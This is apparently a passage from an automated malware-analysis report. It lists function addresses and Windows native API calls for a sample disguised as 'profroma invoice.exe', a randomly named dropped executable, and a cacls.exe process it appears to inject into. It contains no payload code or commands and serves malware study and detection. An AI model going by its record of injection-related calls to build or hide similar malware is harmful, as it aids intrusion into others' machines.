                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_031C2EE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_031C2D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_031C2D30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2DD0 NtDelayExecution,LdrInitializeThunk,7_2_031C2DD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_031C2DF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_031C2C70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2C60 NtCreateKey,LdrInitializeThunk,7_2_031C2C60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_031C2CA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C35C0 NtCreateMutant,LdrInitializeThunk,7_2_031C35C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C39B0 NtGetContextThread,LdrInitializeThunk,7_2_031C39B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2B80 NtQueryInformationFile,7_2_031C2B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2AB0 NtWaitForSingleObject,7_2_031C2AB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2F60 NtCreateProcessEx,7_2_031C2F60
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2F90 NtProtectVirtualMemory,7_2_031C2F90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2FA0 NtQuerySection,7_2_031C2FA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2E30 NtWriteVirtualMemory,7_2_031C2E30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2EA0 NtAdjustPrivilegesToken,7_2_031C2EA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2D00 NtSetInformationFile,7_2_031C2D00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2DB0 NtEnumerateKey,7_2_031C2DB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2C00 NtQueryInformationProcess,7_2_031C2C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2CC0 NtQueryVirtualMemory,7_2_031C2CC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C2CF0 NtOpenProcess,7_2_031C2CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C3010 NtOpenDirectoryObject,7_2_031C3010
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C3090 NtSetValueKey,7_2_031C3090
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C3D10 NtOpenProcessToken,7_2_031C3D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C3D70 NtOpenThread,7_2_031C3D70
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027596D0 NtReadFile,7_2_027596D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027597D0 NtDeleteFile,7_2_027597D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02759560 NtCreateFile,7_2_02759560
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_02759870 NtClose,7_2_02759870
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027599D0 NtAllocateVirtualMemory,7_2_027599D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307F813 NtMapViewOfSection,7_2_0307F813
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307F8BA NtUnmapViewOfSection,7_2_0307F8BA
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_05D4C6600_2_05D4C660
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_05D4E3080_2_05D4E308
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_05D4C2280_2_05D4C228
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_05D4D9000_2_05D4D900
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_07BD11FC0_2_07BD11FC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_07BD89300_2_07BD8930
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_07BDCD480_2_07BDCD48
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 0_2_07BD2A900_2_07BD2A90
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00418CB34_2_00418CB3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040E81C4_2_0040E81C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004033304_2_00403330
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004013E04_2_004013E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0042F4734_2_0042F473
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004024FF4_2_004024FF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004104834_2_00410483
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004025004_2_00402500
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040E6834_2_0040E683
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004106A34_2_004106A3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00416EB34_2_00416EB3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004027044_2_00402704
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040270F4_2_0040270F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_004027104_2_00402710
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040E7CA4_2_0040E7CA
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0040E7D34_2_0040E7D3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B81584_2_017B8158
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CA1184_2_017CA118
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017201004_2_01720100
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E81CC4_2_017E81CC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F01AA4_2_017F01AA
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E41A24_2_017E41A2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C20004_2_017C2000
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EA3524_2_017EA352
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E3F04_2_0173E3F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F03E64_2_017F03E6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D02744_2_017D0274
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B02C04_2_017B02C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017305354_2_01730535
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F05914_2_017F0591
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E24464_2_017E2446
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D44204_2_017D4420
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DE4F64_2_017DE4F6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017307704_2_01730770
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017547504_2_01754750
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172C7C04_2_0172C7C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174C6E04_2_0174C6E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017469624_2_01746962
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017329A04_2_017329A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017FA9A64_2_017FA9A6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173A8404_2_0173A840
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017328404_2_01732840
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0175E8F04_2_0175E8F0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017168B84_2_017168B8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EAB404_2_017EAB40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E6BD74_2_017E6BD7
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172EA804_2_0172EA80
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CCD1F4_2_017CCD1F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173AD004_2_0173AD00
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0172ADE04_2_0172ADE0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01748DBF4_2_01748DBF
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730C004_2_01730C00
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01720CF24_2_01720CF2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D0CB54_2_017D0CB5
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A4F404_2_017A4F40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01750F304_2_01750F30
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D2F304_2_017D2F30
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01772F284_2_01772F28
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173CFE04_2_0173CFE0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01722FC84_2_01722FC8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017AEFA04_2_017AEFA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01730E594_2_01730E59
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EEE264_2_017EEE26
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EEEDB4_2_017EEEDB
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01742E904_2_01742E90
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017ECE934_2_017ECE93
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171F1724_2_0171F172
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017FB16B4_2_017FB16B
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176516C4_2_0176516C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173B1B04_2_0173B1B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E70E94_2_017E70E9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EF0E04_2_017EF0E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DF0CC4_2_017DF0CC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017370C04_2_017370C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171D34C4_2_0171D34C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E132D4_2_017E132D
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0177739A4_2_0177739A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D12ED4_2_017D12ED
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174B2C04_2_0174B2C0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017352A04_2_017352A0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E75714_2_017E7571
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F95C34_2_017F95C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CD5B04_2_017CD5B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017214604_2_01721460
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EF43F4_2_017EF43F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EF7B04_2_017EF7B0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017756304_2_01775630
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E16CC4_2_017E16CC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017399504_2_01739950
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174B9504_2_0174B950
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C59104_2_017C5910
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179D8004_2_0179D800
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017338E04_2_017338E0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EFB764_2_017EFB76
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A5BF04_2_017A5BF0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176DBF94_2_0176DBF9
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174FB804_2_0174FB80
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A3A6C4_2_017A3A6C
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EFA494_2_017EFA49
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E7A464_2_017E7A46
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DDAC64_2_017DDAC6
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CDAAC4_2_017CDAAC
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01775AA04_2_01775AA0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017D1AA34_2_017D1AA3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E7D734_2_017E7D73
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E1D5A4_2_017E1D5A
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01733D404_2_01733D40
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174FDC04_2_0174FDC0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A9C324_2_017A9C32
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EFCF24_2_017EFCF2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EFF094_2_017EFF09
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_016F3FD54_2_016F3FD5
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_016F3FD24_2_016F3FD2
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017EFFB14_2_017EFFB1
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01731F924_2_01731F92
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01739EB04_2_01739EB0
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292C29B6_2_0292C29B
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292C2A46_2_0292C2A4
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292C2ED6_2_0292C2ED
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_029349846_2_02934984
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292C1546_2_0292C154
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292E1746_2_0292E174
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_029367806_2_02936780
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0292DF546_2_0292DF54
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeCode function: 6_2_0294CF446_2_0294CF44
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324A3527_2_0324A352
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032503E67_2_032503E6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0319E3F07_2_0319E3F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032302747_2_03230274
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032102C07_2_032102C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031801007_2_03180100
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0322A1187_2_0322A118
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032181587_2_03218158
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032441A27_2_032441A2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032501AA7_2_032501AA
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032481CC7_2_032481CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032220007_2_03222000
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031B47507_2_031B4750
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031907707_2_03190770
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0318C7C07_2_0318C7C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031AC6E07_2_031AC6E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031905357_2_03190535
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032505917_2_03250591
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032344207_2_03234420
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032424467_2_03242446
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0323E4F67_2_0323E4F6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324AB407_2_0324AB40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03246BD77_2_03246BD7
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0318EA807_2_0318EA80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031A69627_2_031A6962
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0325A9A67_2_0325A9A6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031929A07_2_031929A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0319A8407_2_0319A840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031928407_2_03192840
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031768B87_2_031768B8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031BE8F07_2_031BE8F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03232F307_2_03232F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031B0F307_2_031B0F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031D2F287_2_031D2F28
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03204F407_2_03204F40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0320EFA07_2_0320EFA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03182FC87_2_03182FC8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0319CFE07_2_0319CFE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324EE267_2_0324EE26
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03190E597_2_03190E59
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031A2E907_2_031A2E90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324CE937_2_0324CE93
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324EEDB7_2_0324EEDB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0319AD007_2_0319AD00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0322CD1F7_2_0322CD1F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031A8DBF7_2_031A8DBF
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0318ADE07_2_0318ADE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03190C007_2_03190C00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03230CB57_2_03230CB5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03180CF27_2_03180CF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324132D7_2_0324132D
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0317D34C7_2_0317D34C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031D739A7_2_031D739A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031952A07_2_031952A0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032312ED7_2_032312ED
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031AB2C07_2_031AB2C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0325B16B7_2_0325B16B
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0317F1727_2_0317F172
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031C516C7_2_031C516C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0319B1B07_2_0319B1B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324F0E07_2_0324F0E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032470E97_2_032470E9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031970C07_2_031970C0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0323F0CC7_2_0323F0CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324F7B07_2_0324F7B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031D56307_2_031D5630
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032416CC7_2_032416CC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032475717_2_03247571
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0322D5B07_2_0322D5B0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032595C37_2_032595C3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324F43F7_2_0324F43F
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031814607_2_03181460
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324FB767_2_0324FB76
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031AFB807_2_031AFB80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03205BF07_2_03205BF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031CDBF97_2_031CDBF9
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03203A6C7_2_03203A6C
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03247A467_2_03247A46
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324FA497_2_0324FA49
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03231AA37_2_03231AA3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0322DAAC7_2_0322DAAC
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031D5AA07_2_031D5AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0323DAC67_2_0323DAC6
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_032259107_2_03225910
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031999507_2_03199950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031AB9507_2_031AB950
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031FD8007_2_031FD800
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031938E07_2_031938E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324FF097_2_0324FF09
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03191F927_2_03191F92
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324FFB17_2_0324FFB1
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03153FD57_2_03153FD5
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03153FD27_2_03153FD2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03199EB07_2_03199EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03247D737_2_03247D73
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03193D407_2_03193D40
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03241D5A7_2_03241D5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_031AFDC07_2_031AFDC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_03209C327_2_03209C32
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0324FCF27_2_0324FCF2
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027420207_2_02742020
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273CED07_2_0273CED0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273B2697_2_0273B269
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273B2207_2_0273B220
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273B2177_2_0273B217
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273D0F07_2_0273D0F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0273B0D07_2_0273B0D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027457007_2_02745700
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_027439007_2_02743900
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0275BEC07_2_0275BEC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307E3AB7_2_0307E3AB
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307E2887_2_0307E288
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_030852C47_2_030852C4
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307E7437_2_0307E743
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_030854557_2_03085455
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307CAC37_2_0307CAC3
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0307D8087_2_0307D808
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 031D7E54 appears 111 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 031C5130 appears 58 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 031FEA12 appears 86 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0317B970 appears 280 times
                Source: C:\Windows\SysWOW64\cacls.exeCode function: String function: 0320F290 appears 105 times
